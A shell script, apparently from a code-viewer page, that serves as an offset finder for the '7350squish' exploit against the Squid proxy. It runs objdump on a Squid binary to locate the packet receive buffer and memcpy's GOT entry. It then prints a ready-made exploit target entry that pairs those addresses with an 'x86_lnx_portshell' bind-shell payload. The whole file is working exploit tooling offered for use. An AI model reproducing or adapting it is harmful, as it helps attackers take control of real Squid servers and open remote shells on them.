1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
|
#!/bin/sh
# 7350squish offset finder
# lorian & scut
check_util ()
{
for util in $*; do
echo -n "checking for $util: "
if ! which $util; then
echo "not found, aborting"
exit
fi
done
}
echo "7350squish exploit offset finder"
echo
if [ $# != 1 ]; then
echo "usage: $0 /path/to/squid/binary"
echo
exit
fi;
check_util awk objdump
echo
bufferbase=`objdump -D $1 2>/dev/null | \
grep "68 00 02 00 00" -A 1 | tail -1 | cut -d '$' -f2`
retaddr=`echo $bufferbase | awk 'function hex2num(s)
{
n = length (s)
v = 0
for (i = 1; i < n-1; i++) {
c = tolower(substr (s, i+2, 1));
if (c=="a") c=10;
if (c=="b") c=11;
if (c=="c") c=12;
if (c=="d") c=13;
if (c=="e") c=14;
if (c=="f") c=15;
v = v * 16 + c;
}
return v
}
{
printf ("0x%08x\n", hex2num ($0) + 144)
}'`
#retaddr=`echo $bufferbase | awk '{ printf ("0x%08x\n", $0 + 144) }'`
retloc=`objdump -R $1 2>/dev/null | \
grep "memcpy$" | awk '{ printf ("0x%s", $1) }'`
echo "{ \"NEW TARGET\","
echo "x86_lnx_portshell, sizeof (x86_lnx_portshell) - 1,"
echo "$retloc, /* GOT: memcpy */"
echo "$retaddr, /* packet receive buffer + 0x90 */"
echo "0x0182, 288 },"
echo
echo finished.
|
